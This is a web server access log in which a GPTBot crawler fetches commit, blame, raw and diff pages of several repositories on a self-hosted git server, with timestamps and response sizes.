- GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 9909] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:15:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:15:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 1112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:15:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 1084] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:15:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 10846] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:15:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13253] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9927] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" +[17/Feb/2026:15:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 2731] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" +[17/Feb/2026:15:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fOpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 22079] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:15:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 12154] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 11521] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 11058] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 19882] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 11532] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 10425] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fpython3" [Client 74.7.227.38] [Length 23655] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 22027] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js" +[17/Feb/2026:15:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 11543] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10941] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" +[17/Feb/2026:15:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 11435] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:15:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 10416] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 10415] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 25198] [Gzip 12.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 22429] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:15:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:15:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 11073] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 10421] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:15:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:15:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:15:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fdotenv" [Client 74.7.227.38] [Length 24082] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:15:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fuvicorn" [Client 74.7.227.38] [Length 24085] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fstatic%2fjs%2fapp.js" [Client 74.7.227.38] [Length 37481] [Gzip 7.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:15:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10195] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" +[17/Feb/2026:15:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm" [Client 74.7.227.38] [Length 10441] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:15:26:14 +0000] - 200 200 - GET https 